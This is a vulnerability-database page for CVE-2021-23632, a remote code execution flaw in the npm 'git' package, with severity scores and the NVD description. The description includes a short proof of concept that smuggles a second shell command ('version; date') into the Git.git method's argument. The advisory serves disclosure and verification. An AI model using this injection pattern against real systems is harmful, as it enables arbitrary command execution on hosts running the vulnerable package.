AUGUST 4, 2026
Live Feed
Back to database
Case File

CVE-2021-23632

MEDIUM · CVSS 6.6 EPSS 2.20% Public Exploit

Source: NVD + CISA KEV + EPSS (historical backfill) · Published 2022-03-17 · Last synced 2026-08-04

CyberRota Analysis

This is a medium severity vulnerability with a CVSS score of 6.6. Public exploit code or proof-of-concept references have been detected in its references. It may be remotely exploitable.

Public Exploit Signal

A public exploit, PoC, GitHub repository or Metasploit reference was detected for this CVE.

Detected Signals
exploit poc remote code execution code execution

Note: these links are listed for security research and verification purposes only.

CVE
CVE-2021-23632
Severity
MEDIUM
CVSS
6.6
EPSS
2.20%

Original NVD Description

All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.